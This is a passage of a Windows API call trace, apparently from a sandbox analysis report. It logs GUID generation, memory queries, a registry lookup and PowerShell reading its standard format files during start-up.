	[0378.059] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x39fd904b, Data2=0xc987, Data3=0x46a2, Data4=([0]=0xbb, [1]=0x14, [2]=0xcc, [3]=0x56, [4]=0x4a, [5]=0xbd, [6]=0x14, [7]=0x76))) returned 0x0
	[0378.059] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x7e1a7b0e, Data2=0x2f62, Data3=0x465c, Data4=([0]=0xa3, [1]=0xb0, [2]=0xe9, [3]=0xdf, [4]=0xb1, [5]=0xb6, [6]=0xb8, [7]=0x71))) returned 0x0
	[0378.059] VirtualQuery (in: lpAddress=0x14bc40, lpBuffer=0x14cb00, dwLength=0x30 | out: lpBuffer=0x14cb00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.060] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x4db90c21, Data2=0xa51b, Data3=0x486b, Data4=([0]=0xb5, [1]=0xf3, [2]=0x0, [3]=0x72, [4]=0xc2, [5]=0x23, [6]=0x15, [7]=0xb6))) returned 0x0
	[0378.060] VirtualQuery (in: lpAddress=0x14bc40, lpBuffer=0x14cb00, dwLength=0x30 | out: lpBuffer=0x14cb00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.062] VirtualQuery (in: lpAddress=0x14bc40, lpBuffer=0x14cb00, dwLength=0x30 | out: lpBuffer=0x14cb00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.063] VirtualQuery (in: lpAddress=0x14bc40, lpBuffer=0x14cb00, dwLength=0x30 | out: lpBuffer=0x14cb00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.063] VirtualQuery (in: lpAddress=0x14bc40, lpBuffer=0x14cb00, dwLength=0x30 | out: lpBuffer=0x14cb00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.063] VirtualQuery (in: lpAddress=0x14bc40, lpBuffer=0x14cb00, dwLength=0x30 | out: lpBuffer=0x14cb00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.063] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xd6bcdabb, Data2=0x667e, Data3=0x47a4, Data4=([0]=0x8d, [1]=0x2, [2]=0xf2, [3]=0xad, [4]=0xd4, [5]=0xa, [6]=0xa9, [7]=0x26))) returned 0x0
	[0378.063] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x280f4c90, Data2=0x6e43, Data3=0x44bd, Data4=([0]=0xb7, [1]=0xdd, [2]=0x25, [3]=0x15, [4]=0xc7, [5]=0x9, [6]=0x83, [7]=0x31))) returned 0x0
	[0378.063] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x988f57d1, Data2=0xa610, Data3=0x4dbe, Data4=([0]=0xb2, [1]=0xec, [2]=0x72, [3]=0xa8, [4]=0xb6, [5]=0x81, [6]=0xe4, [7]=0xc2))) returned 0x0
	[0378.063] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x2ca19743, Data2=0x4fb6, Data3=0x4080, Data4=([0]=0x81, [1]=0xc6, [2]=0xc4, [3]=0x28, [4]=0x71, [5]=0x62, [6]=0xc7, [7]=0xf4))) returned 0x0
	[0378.064] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xfd41a2b4, Data2=0xefd0, Data3=0x4625, Data4=([0]=0xbd, [1]=0x83, [2]=0x7b, [3]=0x38, [4]=0xc9, [5]=0x9b, [6]=0x6b, [7]=0x18))) returned 0x0
	[0378.064] VirtualQuery (in: lpAddress=0x14bf00, lpBuffer=0x14cdc0, dwLength=0x30 | out: lpBuffer=0x14cdc0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.064] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xa2057c80, Data2=0x8b2d, Data3=0x430b, Data4=([0]=0xbc, [1]=0x87, [2]=0xa3, [3]=0xcb, [4]=0x61, [5]=0x1f, [6]=0xbf, [7]=0x46))) returned 0x0
	[0378.064] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xc9b4f20f, Data2=0xb58c, Data3=0x4d04, Data4=([0]=0x80, [1]=0xa4, [2]=0xe9, [3]=0x0, [4]=0xb9, [5]=0xf0, [6]=0xce, [7]=0xe1))) returned 0x0
	[0378.064] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x82321034, Data2=0x7345, Data3=0x465a, Data4=([0]=0xb5, [1]=0xb3, [2]=0x2b, [3]=0x12, [4]=0x4c, [5]=0x0, [6]=0x12, [7]=0xd))) returned 0x0
	[0378.064] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x21af3d07, Data2=0x478d, Data3=0x494a, Data4=([0]=0x86, [1]=0x28, [2]=0xf5, [3]=0xb6, [4]=0x48, [5]=0x5d, [6]=0x69, [7]=0xe3))) returned 0x0
	[0378.064] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x14f4e90, Data2=0xaf9e, Data3=0x4a58, Data4=([0]=0x87, [1]=0x8c, [2]=0x5a, [3]=0x1d, [4]=0xcc, [5]=0x46, [6]=0xd9, [7]=0xb2))) returned 0x0
	[0378.064] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xf525769, Data2=0x57d1, Data3=0x42f8, Data4=([0]=0x8d, [1]=0x7f, [2]=0xcb, [3]=0xa, [4]=0x18, [5]=0x8f, [6]=0x2d, [7]=0x4d))) returned 0x0
	[0378.064] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xe7d8e115, Data2=0xdac0, Data3=0x40b6, Data4=([0]=0x8e, [1]=0x3f, [2]=0x8d, [3]=0x74, [4]=0x4f, [5]=0xd7, [6]=0x41, [7]=0x5d))) returned 0x0
	[0378.065] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x215622b0, Data2=0xd2e1, Data3=0x4011, Data4=([0]=0xb6, [1]=0x95, [2]=0x43, [3]=0x3b, [4]=0x93, [5]=0x48, [6]=0x3d, [7]=0x13))) returned 0x0
	[0378.065] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x61b7d1d0, Data2=0xc112, Data3=0x4689, Data4=([0]=0xb1, [1]=0x30, [2]=0x3f, [3]=0x62, [4]=0xec, [5]=0xb3, [6]=0x4f, [7]=0xe0))) returned 0x0
	[0378.065] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x2a05991c, Data2=0x1f0a, Data3=0x4361, Data4=([0]=0x83, [1]=0xdc, [2]=0x82, [3]=0x5e, [4]=0xd1, [5]=0xa6, [6]=0xa2, [7]=0x98))) returned 0x0
	[0378.065] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xbf7858e7, Data2=0xa285, Data3=0x43ae, Data4=([0]=0xa7, [1]=0xd5, [2]=0x8a, [3]=0xd5, [4]=0xa2, [5]=0x10, [6]=0xdb, [7]=0x37))) returned 0x0
	[0378.065] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xd4f60e9c, Data2=0x1aec, Data3=0x460b, Data4=([0]=0x9e, [1]=0x96, [2]=0xbb, [3]=0xd0, [4]=0x42, [5]=0xdd, [6]=0xd5, [7]=0x88))) returned 0x0
	[0378.065] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xd269ffdd, Data2=0x59bb, Data3=0x4a50, Data4=([0]=0x9b, [1]=0xf, [2]=0x44, [3]=0x95, [4]=0xa, [5]=0x88, [6]=0x15, [7]=0x50))) returned 0x0
	[0378.065] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x123f893f, Data2=0x709, Data3=0x447e, Data4=([0]=0x92, [1]=0xa7, [2]=0xca, [3]=0x46, [4]=0xdb, [5]=0x2f, [6]=0x2d, [7]=0x2e))) returned 0x0
	[0378.065] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xa6da115a, Data2=0x7cc7, Data3=0x487c, Data4=([0]=0x9e, [1]=0x90, [2]=0xc5, [3]=0x76, [4]=0x8f, [5]=0x8f, [6]=0xd, [7]=0xad))) returned 0x0
	[0378.065] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x5286a3be, Data2=0x505f, Data3=0x4f97, Data4=([0]=0xb1, [1]=0x77, [2]=0x6f, [3]=0x2e, [4]=0x10, [5]=0x35, [6]=0x6c, [7]=0xd))) returned 0x0
	[0378.065] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x7d68a645, Data2=0x5c83, Data3=0x4507, Data4=([0]=0x8f, [1]=0xbe, [2]=0xa9, [3]=0x74, [4]=0xf7, [5]=0x1, [6]=0x5f, [7]=0xd))) returned 0x0
	[0378.066] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xe31eee88, Data2=0x51f3, Data3=0x470b, Data4=([0]=0x87, [1]=0x74, [2]=0x25, [3]=0xcf, [4]=0x84, [5]=0x16, [6]=0x4a, [7]=0xc7))) returned 0x0
	[0378.066] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xa6468cb7, Data2=0xbe3b, Data3=0x4ddc, Data4=([0]=0xb5, [1]=0x9f, [2]=0xf6, [3]=0xc6, [4]=0x32, [5]=0x65, [6]=0x6d, [7]=0xfd))) returned 0x0
	[0378.066] VirtualQuery (in: lpAddress=0x14bc40, lpBuffer=0x14cb00, dwLength=0x30 | out: lpBuffer=0x14cb00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.066] VirtualQuery (in: lpAddress=0x14bc40, lpBuffer=0x14cb00, dwLength=0x30 | out: lpBuffer=0x14cb00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.066] VirtualQuery (in: lpAddress=0x14bc40, lpBuffer=0x14cb00, dwLength=0x30 | out: lpBuffer=0x14cb00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.067] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x438d806a, Data2=0xcea7, Data3=0x4f81, Data4=([0]=0xb7, [1]=0x76, [2]=0xe3, [3]=0x3a, [4]=0xcf, [5]=0x92, [6]=0xca, [7]=0x77))) returned 0x0
	[0378.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0378.067] SetErrorMode (uMode=0x1) returned 0x1
	[0378.067] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0378.067] GetFileType (hFile=0x300) returned 0x1
	[0378.067] SetErrorMode (uMode=0x1) returned 0x1
	[0378.067] GetFileType (hFile=0x300) returned 0x1
	[0378.067] ReadFile (in: hFile=0x300, lpBuffer=0x2c85f38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2c85f38*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.068] ReadFile (in: hFile=0x300, lpBuffer=0x2c85f38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2c85f38*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.068] ReadFile (in: hFile=0x300, lpBuffer=0x2c85f38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2c85f38*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.069] ReadFile (in: hFile=0x300, lpBuffer=0x2c85f38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2c85f38*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.069] ReadFile (in: hFile=0x300, lpBuffer=0x2c85f38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2c85f38*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.069] ReadFile (in: hFile=0x300, lpBuffer=0x2c85f38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2c85f38*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.069] ReadFile (in: hFile=0x300, lpBuffer=0x2c85f38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2c85f38*, lpNumberOfBytesRead=0x14cfd8*=0x119, lpOverlapped=0x0) returned 1
	[0378.069] ReadFile (in: hFile=0x300, lpBuffer=0x2c85f38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2c85f38*, lpNumberOfBytesRead=0x14cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0378.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0378.070] SetErrorMode (uMode=0x1) returned 0x1
	[0378.070] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14cf80 | out: lpFileInformation=0x14cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0378.570] SetErrorMode (uMode=0x1) returned 0x1
	[0378.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0378.571] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d068 | out: phkResult=0x14d068*=0x300) returned 0x0
	[0378.571] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cfec, lpData=0x0, lpcbData=0x14cfe8*=0x0 | out: lpType=0x14cfec*=0x1, lpData=0x0, lpcbData=0x14cfe8*=0x56) returned 0x0
	[0378.571] CoTaskMemAlloc (cb=0x5a) returned 0x42efa0
	[0378.571] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cfbc, lpData=0x42efa0, lpcbData=0x14cfb8*=0x56 | out: lpType=0x14cfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14cfb8*=0x56) returned 0x0
	[0378.571] CoTaskMemFree (pv=0x42efa0) 
	[0378.571] RegCloseKey (hKey=0x300) returned 0x0
	[0378.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0378.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0378.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0378.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0378.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0378.572] VirtualQuery (in: lpAddress=0x14bb00, lpBuffer=0x14c9c0, dwLength=0x30 | out: lpBuffer=0x14c9c0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.572] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xe8a17318, Data2=0xcce4, Data3=0x4c25, Data4=([0]=0x89, [1]=0x54, [2]=0xa6, [3]=0xfe, [4]=0xf4, [5]=0x7e, [6]=0xa3, [7]=0xf6))) returned 0x0
	[0378.573] VirtualQuery (in: lpAddress=0x14bc40, lpBuffer=0x14cb00, dwLength=0x30 | out: lpBuffer=0x14cb00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.573] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xf071e0ba, Data2=0x9cd4, Data3=0x4171, Data4=([0]=0xb4, [1]=0xe3, [2]=0xcd, [3]=0x90, [4]=0xc4, [5]=0xe0, [6]=0x73, [7]=0xc5))) returned 0x0
	[0378.573] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xa0fe648c, Data2=0x849d, Data3=0x4e97, Data4=([0]=0xb3, [1]=0x46, [2]=0xdb, [3]=0xf7, [4]=0x49, [5]=0x9f, [6]=0xa3, [7]=0xfe))) returned 0x0
	[0378.573] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xcd9798e0, Data2=0x3458, Data3=0x405b, Data4=([0]=0xa0, [1]=0x82, [2]=0xfe, [3]=0xa7, [4]=0x6b, [5]=0xe6, [6]=0xfc, [7]=0xd1))) returned 0x0
	[0378.573] VirtualQuery (in: lpAddress=0x14bc40, lpBuffer=0x14cb00, dwLength=0x30 | out: lpBuffer=0x14cb00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.573] VirtualQuery (in: lpAddress=0x14bc40, lpBuffer=0x14cb00, dwLength=0x30 | out: lpBuffer=0x14cb00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0378.573] SetErrorMode (uMode=0x1) returned 0x1
	[0378.574] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0378.574] GetFileType (hFile=0x300) returned 0x1
	[0378.574] SetErrorMode (uMode=0x1) returned 0x1
	[0378.574] GetFileType (hFile=0x300) returned 0x1
	[0378.574] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.575] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.575] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.575] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.575] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.575] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.576] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.576] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.577] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.577] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.577] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.577] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.577] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.578] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.578] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.578] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.579] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.580] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.580] ReadFile (in: hFile=0x300, lpBuffer=0x2ce20d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ce20d8*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
